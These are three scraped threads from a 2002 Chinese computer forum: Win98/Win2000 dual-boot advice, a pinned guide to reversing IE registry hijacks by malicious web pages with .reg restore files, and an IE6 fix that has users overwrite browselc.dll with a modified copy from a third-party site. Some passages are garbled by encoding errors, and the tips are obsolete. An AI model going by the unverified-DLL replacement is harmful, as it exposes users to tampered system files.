关于在win2000上安win98的问题 - 经 典 论 坛

  ? 站点首页 | 论坛首页 | 注册 | 搜索 | 帮助 | 精华区 | 找回口令
  ? 个人信息 | 查看收藏 | 设置 | 登录 | 退出 | 悄悄话 | 发帖跟踪 | 论坛规则

论坛信使： 推荐本页给您的朋友！

经 典 论 坛
计算机技术
关于在win2000上安win98的问题

上一贴 | 下一贴
发表人 主题: 关于在win2000上安win98的问题
eden

高级用户
积分：151
发帖：41
来自：北京
注册：2002-01-26
 发表于 2002-03-02 15:16:03 按此观看eden的个人资料 按此发邮件给eden eden 的 oicq 是1292510,查看 1292510 的资料 收藏该主题供以后查看 发送悄悄话给eden 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看eden的IP
我已经安装了win2000，想在win2000上安win98，需要注意什么？98会不会覆盖2000的引导文件，记得2000有个多操作系统的启动菜单。

|　无　欲　则　刚　|
jill

终级用户
积分：590
发帖：180
来自：沈阳市
注册：2001-12-10
 发表于 2002-03-02 16:48:53 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
好像从98上装2000

誓与WIN2000共存
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-02 16:49:30 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
装完后再装一便2000就OK了

::古落根门::

唯有不断学习 才能不断进步

mao

现任版主
积分：1694
发帖：691
来自：北京
注册：2000-07-23
 发表于 2002-03-02 17:03:35 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
我没具体试过
但是觉得装完98后用2000的紧急修复盘修复一下就行了。

解决问题才有进步
解决问题才有进步
eden

高级用户
积分：151
发帖：41
来自：北京
注册：2002-01-26
 发表于 2002-03-02 20:25:16 按此观看eden的个人资料 按此发邮件给eden eden 的 oicq 是1292510,查看 1292510 的资料 发送悄悄话给eden 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看eden的IP
我已经装了win2000，难道装完98后，再装一遍2000？

|　无　欲　则　刚　|
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-03 11:09:34 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
这是最简单的方法啊，用2000的盘修复就是麻烦一些
一般装多系统（MS）的顺序是从低级到高级

::古落根门::

唯有不断学习 才能不断进步

啸

无意
现任版主
积分：6219
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-03-03 11:42:36 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP

引用:

可先把原“c:\boot.ini”文件备份下来，98重传系统（或重新安装）完成后，在98中运行2K的安装程序，当出现提示后选不重新启动，再进入“c:\”，把备份下来的“c:\boot.ini”文件覆盖回去，最后删除根目录下所有带＄符号的东东（一般有一个目录和两个文件，都是安装2K时产生的临时文件）重新启动即可！

    如果不小心选了重新启动，则在多重启动菜单中进入98后，再做恢复“c:\boot.ini”文件等操作。

    如果没有备份原“c:\boot.ini”文件，则需手动进行修改。在98中打开“c:\boot.ini”文件，将2K的安装一项（就是有“install/upgrade”的选项）删掉，再删除根目录下所有带＄符号的东东（一般有一个目录和两个文件，都是安装2K时产生的临时文件）后，重新启动就OK了！

    如果进不了2K，不要忘了按F8，用“上次成功启动的配置”进入哦！

http://www.ejiajia.com/it/software/windows/2001219/58558.htm

其实许多东西网上都有现成的，养成搜索的好习惯可以节省很多时间。

休整一段时间。

Blueidea Web Team.
Moderator Of Computer Technology Forum

啸

无意
现任版主
积分：6219
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-03-04 08:19:10 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
经过实践，这个办法也适用于在XP上安装2000。
我昨天装了个win2000 sever版，原来的XP就不能进了，用XP的安装盘再进行安装到第一次重起，退出安装，这时XP和2000都能进了。
看来安装盘的用处真的很大。

休整一段时间。

Blueidea Web Team.
Moderator Of Computer Technology Forum

凌志

终级用户
积分：544
发帖：166
来自：鞍山
注册：2001-01-09
 发表于 2002-03-04 23:40:35 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP
2000上安装98，直接用98光盘引导安装就行了，自动出现双启动菜单。

网络天下
四海一家
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-03-05 09:38:39 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
有可能先装2000后装98自动出双启吗？我是没有试过

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
kmdesign

终级用户
积分：806
发帖：463
来自：新疆·武汉
注册：2001-12-02
 发表于 2002-05-27 13:32:44 按此观看kmdesign的个人资料 按此发邮件给kmdesign kmdesign 的 oicq 是6169277,查看 6169277 的资料 发送悄悄话给kmdesign 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kmdesign的IP
我也遇到过这个问题：
先装winme后装win2k开机后就直接进win2k
先装win2k后装winme开机后就直接进winme
没有选择操作系统的那个页面。而我们寝室的另一台机子装完双操开机后就让你选择进入哪个操作系统。
为什么？？
是不是主板的区别？
我至今也没用上双操，555555

就为你那被雨淋湿的花裙子
我给你一个一生的诺言
上一贴 | 下一贴
快速回复 主题：关于在win2000上安win98的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索

本站网络平台由重庆网通信息港宽带网络有限公司提供


IE相关反修改集粹 - 经 典 论 坛

计算机技术
IE相关反修改集粹

上一贴 | 下一贴
发表人 主题: IE相关反修改集粹
AirTree

超级用户
积分：375
发帖：231
来自：无人地带
注册：2001-12-07
 发表于 2001-12-19 12:04:45 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 收藏该主题供以后查看 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
总有朋友说自己的IE出了问题，不外乎是IE被恶意修改了，这里有很多防范和反修改的技巧，和大家共享！呵呵，上帝保佑！

最近一些网页为了达到宣传的目的，利用IE的漏洞修改浏览者的注册表，肆意修改IE的首页、标题栏等内容，令人憎恶。本文按直接修改注册表和用MagicSet修改两个方法说明如何去除这些内容及防范。如果你对注册表比较熟悉，可参考本文所述的键值直接对其修改，如果对注册表不熟的话建议使用MagicSet即超级兔子魔法设置软件来改，安全且方便，本文以3.92版为例。

一、修改IE的标题栏

即在IE浏览器最上方的蓝色横条里做广告，而不是显示默认的“Microsoft Internet Explorer”。这种修改非常常见，有人也特意针对它编制了反修改的程序。

1.注册表法

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main
HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main在注册表中找到以上两处主键，将其下的“Window Title”主键删除，并关闭所有打开的IE浏览器窗口再重新打开就能看到效果。

2.MagicSet法

点击“IE 4/5”，点击与“IE 标题”字体平行的“复原”按钮即可。

二、修改IE的首页

这个改回来很方便，在IE的设置里就有。比较麻烦的是某些网页在浏览者的硬盘里写入程序，使重启计算机后首页设置又被改了回去，这时可使用“系统配置实用程序”来解决。开始—运行，键入msconfig点击“确定”，在弹出的窗口中切换到“启动”选项卡，禁用可疑程序启动项。

三、在Windows启动时显示一个窗口，点确定才能进去

这个设置其实与IE无关，而是Windows的登录提示窗口，不过最近有些网页对它动上了脑筋，在这个窗口里做广告。

1.注册表法

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon在注册表中找到此主键，将其下的“LegalNoticeCaption”和“LegalNoticeText”主键删除即可。

2.MagicSet法

点击“安全与多用户”，再点击左上角的“+”切换窗口后，清除“启动时要显示的标题”和“启动时要显示的信息”两项内容即可。

四、在IE里点击鼠标右键。在弹出的菜单里显示网页广告

这种情况很少见，我还没碰到过，不过解决方法也不复杂。

1.注册表法

HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt在IE中显示的附加右键菜单都在这里设置，常见的网络蚂蚁和网际快车点击右键下载的信息也存放在这里，只需找到显示广告的主键条目删除即可。

2.MagicSet法

点击“IE 4/5”，再点击左上角的“+”切换窗口后，在上方的列表窗口中即可修改、删除IE的附加右键菜单项。

五、防范

1.因为修改注册表设置都是用的JavaScript脚本语言，所以只需禁用它即可。但这种脚本语言应用广泛，所以建议在IE的设置中将脚本设为“提示”。

2.建议使用一些单窗口多页面的浏览器如NetCaptor等，因为它们往往能更方便地切换脚本设置，象我常用的NetCaptor，用工具栏中的“安全”按钮能很方便地设置脚本、ActiveX和Cookie的启用情况。

3.使用IE6.0，虽然迟迟看不到这个浏览器的正式版本，而且测试版问题很多，但据用过的人说使用它浏览网页，将无法再随意修改你的注册表。

4.使用Win2000的朋友，只需在“控制面板”—“管理工具”—“服务”中禁用Remote Registry Service服务，也无法通过浏览网页来修改你的注册表了。

5.使用Norton AntiVirus 2002 v8.0杀毒软件，这个版本新增Script Blocking功能，将通过IE修改注册表的代码定义为Trojan.Offensive并予以拦截。

六、相关软件

1.MagicSet V3.92
http://www.superrsoft.com/

2.IE浏览器标题栏修改器（IETitleFixer） V1.3
http://www.soft999.com/download1/IETitleFixer13.zip
可修改IE的标题栏、主页及OE的标题栏，只是需要VB6运行库的支持。

3.IE反修改精灵 V1.52
http://www.soft999.com/download1/IESetup.exe
除了可修改IE的标题栏，还可设置为开机自动运行并使桌面图标透明。

七、快速恢复

将以下内容复制粘贴到记事本，并存为UnDoIE.reg文件，注意在保存时选“保存类型”为所有文件，这样它在保存时就不会自动加上.txt的后缀名了。

REGEDIT4

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main]
\"Window Title\"=\"Microsoft Internet Explorer\"
\"Start Page\"=\"about:blank\"

[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]
\"Window Title\"=\"Microsoft Internet Explorer\"

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon]
\"LegalNoticeCaption\"=\"\"
\"LegalNoticeText\"=\"\"

在发现上述IE相关设置被网页修改后，双击UnDoIE.reg即可将上述一、二及三项同时复原了。

打雷了！下雨了！大家快回家收衣服啊……
啸

无意
现任版主
积分：6219
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-01-21 11:12:54 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
很多人都问过这样的问题，置顶几天，相信对大家能有所帮助

休整一段时间。

Blueidea Web Team.
Moderator Of Computer Technology Forum

blueonline

Blueonline
积分：829
发帖：1744
来自：blue-online.
注册：2000-12-09
 发表于 2002-01-22 13:20:58 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP
来补充一点

三、手动清除

1. 注册表被禁用

对注册表的编辑是解决本文所涉及问题的关键所在，而许多朋友在打开注册表修编辑器时，却发现居然连注册表都被"管理员禁用"了！其实这也是含有恶意代码的网页文件捣的鬼。如果您的注册表也被禁用了，可以按下面的方法来解锁：

1.)新建一个文本文件，输入以下内容（注意保持文本格式）：
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000
点击"文件"菜单，选择"保存"命令，以"recover.reg"为文件名保存在任意位置。
2.)双击该"recover.reg"文件，系统弹出"是否确认要将 recover.reg 中的信息添加进注册表"的确认框，点?quot;是"，随后，系统提示"recover.reg 里的信息已被成功地输入注册表"，再点击"确定"即可将注册表解锁并进行随后的修改。

2. 开始菜单的"运行"消失

在"运行"栏中输入regedit是我们常用的打开注册表编辑器的方式。然而有些含恶意代码的网页甚至连这里都不放过，难道它们认为凭这就可以阻止我们对注册表的反修改吗？没问题，用两个简单的方法就可以把"运行"恢复。
其一，进入C:\WINNT（Win9X的用户为C:\WINDOWS），找到"regedit.exe"，双击它就可以打开注册表编辑器，接着请定位到：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
找到"NoRun"值项，右键单击之，选择"修改"（或者直接删除更好），把它的值改为 0，重新启动电脑即可；
其二，新建一个文本文件，输入以下内容ㄗ⒁獗３治谋靖袷剑?br> REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoRun"=dword:00000000
将该文件保存为run.reg文件，双击该文件，重启电脑后，再打开"开始"菜单看看，"运行"选项是不是已经恢复了呢？

3. IE浏览器的标题栏被修改

这是目前最常见的修改IE浏览器的方式。它的反修改也很容易，首先打开"开始"菜单，选?quot;运行...... "命令，在弹出的输入框中输入"regedit"，点击"确定"即打开了注册表编辑器。然后请定位到：
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main 、
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 及HKEY_USERS\.DEFAULT\Control Panel
三处子项，您会发现在它们下面都有一个叫"Window Title"的值项（也可能只有一处有，关键是要修改HKCU的值项），用鼠标右键单击该值项，在弹出菜单选择"修改"，将它修改为默认的"Microsoft Internet Explorer"或者任意您希望看到的语句，最后关闭注册表编辑器并打开一个新的IE浏览器窗口，就能看到您设定的效果。

4. OutLook的标题栏被修改

这个情况比较少见，至少我没有遇到过，只怯型研葱爬囱剩也胖烙行┤司尤晃蘖牡秸庵值夭健２还还叵担姆葱薷耐芗虻ィ蚩⒉岜肀嗉鳎ㄎ坏剑?br> HKEY_CURRENT_USER\Software\Microsoft\Outlook Express
子项下，找到值项"Window Title"，和反修改IE浏览器的方法一样来修改"Window Title"值。最后关闭注册表编辑器并重起OutLook即可看到效果。

5. IE浏览器的首页被修改

这可能是目前网友反映最多的一个问题。一开始的时候解决这个问题很简单，在IE的菜单中选择："工具"-->"Internet选项"-->"常规" ，在"主页"一栏中进行修改即可。但随着事态的发展，形势日趋严峻：一些网站的站长将多个脚本程序联合使用，导致的后果往往就是首页被修改的同时，IE的"主页"选项也被禁用（按钮呈灰色不可用状态）！不过，没问题，现在我们就来解决这个问题。
请您打开注册表编辑器。定位到：HKEY_LOCAL_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel及HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
两处子项，你会发现一个名为HomePage的DWORD值项，值为: 1 ，不必犹豫，直接删掉它，或者把值改为0。然后关闭注册表编辑器，新开一个IE浏览器，再依次点击"工具"-->"Internet选项"-->"常规"，你就会发现原来呈灰色的修改IE主页的按钮已经恢复到了可编辑状态。此时您就可以按自己的喜好随意设定浏览器的主页了。

6. IE浏览器的默认页及空白页被修改

打开注册表编辑器，定位到：HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main子项，修改Default_Page_URL的值即可（原IE的默认页为http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=5.5&ar=msnhome）。
定位到：HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main子项，修改Local Page的值即可。

7. 每次开机后弹出一个网页

如果您每次开机后都会弹出一个IE浏览器，那就请您记住地址栏里的网址，然后打开注册表编辑器，定位到：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
看看在该子项下是否有一个以这个网址为值的值项，如果有，删除它。下次开机时就不会再有浏览器弹出了。不过道高一尺，魔高一丈，有时候这样也未必能解决问题。遇到这种情况，您可以在注册表编辑器的菜单里选?quot;编辑"-->"查找……."，在"查找"对话框内输入开机时自动打开的网址，然后点击"查找下一个"，将查找到的值项删除。另外，如果您是使用Win98的用户，请在"开始"菜单中的"运行"对话框内输入"msconfig"，点击确定，打开"系统配置实用程序"并点击"启动"选项卡，检查其中是否有可疑的启动项，有点话请将其禁用（去掉程序前的勾），然后重起系统查看效果。如果您是Win2000的用户，可以copyWin98或WinXP下的"系统配置实用程序"（可以在我的主页http://www.blue-online.net/ 下载。）来查找。

8. 每次开机后弹出一个确定框

这是Windows登陆后的一个提示框，Win98的用户可以在组策略中自由定义提示框的内容。也可在注册表里编辑它。打开注册表编辑器，定位到：
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
该主键下分别有"LegalNoticeCaption"和"LegalNoticeText"两个值项。他们分别定义了该提示框的标题和正文内容。将这两个值项删除即可。

9. IE浏览器的鼠标右键被禁用

其症状即为打开任意一个网页，单击鼠标右键都无法弹出菜单选项。这给许多经常上网的朋友造成了很多不便。和上面一样，打开注册表编辑器，定位到：HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,在该子项下有一个dword值为1的"NoBrowserContextMenu"值项，删掉它即可。

10. 右键菜单内被添加网站链接

很多朋友会在无意间突然发现，自己的右键菜单里不知道什么时候多出了一个"欢迎光临XXXXXX网站"的选项，点击之后便会打开浏览器进入这个网站。其实这往往是通过脚本程序在注册表里做了手脚。我最早遇到这种情况是在5、6年前，那时3721网站就采用了这种技术，在访问者的右键菜单加上了他们网站的快捷方式。解决的方法也很简单，定位到：HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt ,仔细查看其下的子项，删除你不要的即可。当然您也可以照此格式添加自己的快捷方式，比如常去的网站等等。不过要是您对注册表不太熟悉的话，建议您先做好备份再修改。

11. 桌面上的图标全部消失

如果当您打开电脑，发现自己的桌面上居然空空如也，一个图标都不见了，您会作何感想？不用说，这十有八九又是"上网惹得祸"。如果您想恢复，请把注册表定位到：
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，
找到"NoDesktop"值项，右键单击之，选择"修改"（或者干脆删除也可以），把它的值改为0，重新启动电脑即可。看看，是不是又恢复到您熟悉的桌面了^_^？

12. IE工具栏（菜单）被添加网站链接

大家都知道，我们常用的软件如Flashget、ICQ等在安装后，会向IE的工具栏（菜单）中添加它们的快捷方式。现在有些网站也通过恶意脚本修改注册表来达到同样的效果。下面就让我们来解决这个问题，请把注册表定位到：
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions，您会看到在该主键下有一些形同"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"的子键，仔细查看一下您就会明白，这些子键就是解决问题的关键所在，现在您只需将包含恶意网站链接的那个子键删除即可。另外，如果在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\CmdMapping下有和您删除的形同{X......X}一样键值的值项，也请将它删除。完成后关闭注册表编辑器，重新打开一个IE窗口，看看工具栏（菜单）是不是已经恢复了？其实利用这个特性我们还可以DIY一个属于自己的个性工具栏，具体的做法您可以在我的网站的注册表进阶栏目中找到。

流自己的汗，吃自己的饭，靠天、靠地不如自己干。

:::::::bLUE-oNlINE.nET || vERSION 2001 ───────

幽灵

超级用户
积分：362
发帖：217
来自：上海
注册：2001-02-25
 发表于 2002-01-22 15:54:01 按此观看幽灵的个人资料 按此发邮件给幽灵 幽灵 的 oicq 是15868256,查看 15868256 的资料 发送悄悄话给幽灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看幽灵的IP
我以前一直遇到这种问题，现在升级到了IE6.0，有时也用MSN浏览器，外加一个NORTON防火墙，至今没有遇到过（好像在做广告似的）

上帝会保佑我的，一切都会有的！
啸

无意
现任版主
积分：6219
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-01-23 21:39:02 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
to blueonline:
谢谢你的补充

欢迎大家多发点类似的技巧、经验、总结、集锦之类的文章，我想这一方面可以帮助别人，一方面也可以使自己学到更多的东西。对于这些热心的朋友，我们将会尽版主所能对帖子进行打分奖励 。
最后要补充的是如果是引用的文章，请写上出处，这样做也是为了经典论坛好，避免不必要的麻烦，希望大家能理解与合作，谢谢

休整一段时间。

Blueidea Web Team.
Moderator Of Computer Technology Forum

bluegenius

初级用户
积分：39
发帖：10
来自：长沙湖南中国
注册：2001-05-28
 发表于 2002-01-25 18:05:45 按此观看bluegenius的个人资料 按此发邮件给bluegenius bluegenius 的 oicq 是5670445,查看 5670445 的资料 发送悄悄话给bluegenius 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluegenius的IP
很号

我是一个人，一个平凡的人，我需要波澜，也需要精彩。
bluegenius

初级用户
积分：39
发帖：10
来自：长沙湖南中国
注册：2001-05-28
 发表于 2002-01-25 18:23:45 按此观看bluegenius的个人资料 按此发邮件给bluegenius bluegenius 的 oicq 是5670445,查看 5670445 的资料 发送悄悄话给bluegenius 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluegenius的IP
啸

你跟我是一天申请的

我才发现

不过分数嘛,差得太远了

呵呵

我是一个人，一个平凡的人，我需要波澜，也需要精彩。
bluegenius

初级用户
积分：39
发帖：10
来自：长沙湖南中国
注册：2001-05-28
 发表于 2002-01-25 18:27:56 按此观看bluegenius的个人资料 按此发邮件给bluegenius bluegenius 的 oicq 是5670445,查看 5670445 的资料 发送悄悄话给bluegenius 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluegenius的IP
看错了

对不起.错了一格

我是一个人，一个平凡的人，我需要波澜，也需要精彩。
bluegenius

初级用户
积分：39
发帖：10
来自：长沙湖南中国
注册：2001-05-28
 发表于 2002-01-25 18:30:03 按此观看bluegenius的个人资料 按此发邮件给bluegenius bluegenius 的 oicq 是5670445,查看 5670445 的资料 发送悄悄话给bluegenius 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluegenius的IP
看错了

对不起.错了一格

我是一个人，一个平凡的人，我需要波澜，也需要精彩。
路明

超级用户
积分：425
发帖：133
来自：山东临沂
注册：2002-01-12
 发表于 2002-01-26 10:04:52 按此观看路明的个人资料 该用户不允许显示它的电子邮件 访问路明的主页 路明 的 oicq 是3767454,查看 3767454 的资料 发送悄悄话给路明 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看路明的IP
修改注册表等很麻烦，直接下载一个IE的反修精灵不是更好？
点此下载IE反修精灵

[这消息被路明编辑过(编辑时间2002-01-26 10:08:07)]
[这消息被路明编辑过(编辑时间2002-01-26 10:09:14)]
[这消息被路明编辑过(编辑时间2002-01-26 10:09:14)]

如果说有钱是一种错，我宁愿一错再错，可是现在我没有错。
欢迎访问：好易商务网 好易网站制作论坛 哇哈特效站
arrive

终级用户
积分：1298
发帖：433
来自：大连
注册：2000-12-02
 发表于 2002-01-28 22:23:09 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
超级好贴!收藏了!

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
中国坛中文网——网络技术版www.chinafen.com
上一贴 | 下一贴
快速回复 主题：IE相关反修改集粹
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


IE6的 "co.cn" 有没有直接改注册表的方法？ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
IE6的 "co.cn" 有没有直接改注册表的方法？

上一贴 | 下一贴
发表人 | 主题: IE6的 "co.cn" 有没有直接改注册表的方法？
魑魅魍魉 终级用户 积分：539 发帖：209 来自：[狴犴] 注册：2002-02-26 | 发表于 2002-06-29 02:26:08 按此观看魑魅魍魉的个人资料 按此发邮件给魑魅魍魉 收藏该主题供以后查看 发送悄悄话给魑魅魍魉 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看魑魅魍魉的IP 小猫上网嫌下补丁麻烦~ 谢谢！ ├○─○┤ pu!w hw n! shemle aq ll!m noh pue hldaap os noh ss!w I hqeq
51windows 海娃 积分：4489 发帖：1308 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-06-29 03:09:03 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 那个错误是在一个文件里面，注册表是改不了的！ 修改好的49.5K 在dos下，替换吧！ http://www.52nh.com/hw/soft/browselc.dll Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 51window_asp_Beta
魑魅魍魉 终级用户 积分：539 发帖：209 来自：[狴犴] 注册：2002-02-26 | 发表于 2002-06-29 04:13:12 按此观看魑魅魍魉的个人资料 按此发邮件给魑魅魍魉 发送悄悄话给魑魅魍魉 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看魑魅魍魉的IP 但是DOS命令我不会…… 怎么办~ ├○─○┤ pu!w hw n! shemle aq ll!m noh pue hldaap os noh ss!w I hqeq
lster 超级用户 积分：369 发帖：137 来自：陕西，中国 注册：2001-08-22 | 发表于 2002-06-29 04:19:48 按此观看lster的个人资料 按此发邮件给lster lster 的 oicq 是2516449,查看 2516449 的资料 发送悄悄话给lster 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lster的IP 首先在你的计算机找到browselc.dll这个文件,比如在c:/temp文件夹 然后进入DOS, 输入:copy browselc.dll c:/temp 然后windows询问是否要求覆盖. 自己解决吧. If winter comes , can spring be far behind ? come on.....
51windows 海娃 积分：4489 发帖：1308 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-06-29 11:20:14 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP browselc.dll在WINNT\system32下 (win98应该是windows\system) Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 51window_asp_Beta
魑魅魍魉 终级用户 积分：539 发帖：209 来自：[狴犴] 注册：2002-02-26 | 发表于 2002-06-29 21:46:07 按此观看魑魅魍魉的个人资料 按此发邮件给魑魅魍魉 发送悄悄话给魑魅魍魉 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看魑魅魍魉的IP 我cpoy了新的browselc.dl~怎么l覆盖那个browselc.dll~ ├○─○┤ pu!w hw n! shemle aq ll!m noh pue hldaap os noh ss!w I hqeq
